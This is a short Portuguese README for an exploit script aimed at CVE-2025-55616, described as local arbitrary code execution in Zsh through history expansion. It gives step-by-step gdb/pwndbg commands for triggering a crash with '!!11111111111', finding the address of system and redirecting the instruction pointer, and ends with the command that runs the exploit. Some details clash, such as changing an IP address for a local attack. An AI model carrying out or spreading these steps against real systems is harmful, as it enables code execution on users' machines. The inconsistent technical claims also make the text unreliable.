
Exploit para CVE-2025-55616, um RCE local no Zsh via expressão de histórico, alcançando execução arbitrária de código com privilégios de usuário.
Para executar este exploit: basta alterar o endereço IP e o "p system" no exploit, porque também testei isso no meu segundo laptop, e para alterá-lo execute o seguinte comando no gdb (especialmente no pwndbg):
$ gdb zsh -f (no terminal)
pwndbg> run -f
username% ! (username será o seu, apenas escreva ! )
username% !!11111111111 (mesma coisa aqui, apenas escreva !!11111111111 )
pwndbg> p system
depois de obter o endereço do "p system", basta alterá-lo em
b'set $rip = 0x7ffff7cc9110', (use o endereço do seu p system no lugar de 0x7ffff7cc9110
Esta vulnerabilidade permite que atacantes locais alcancem Execução Arbitrária de Código (RCE) com os privilégios do usuário que executa o processo Zsh.
python3 CVE-2025-55616.py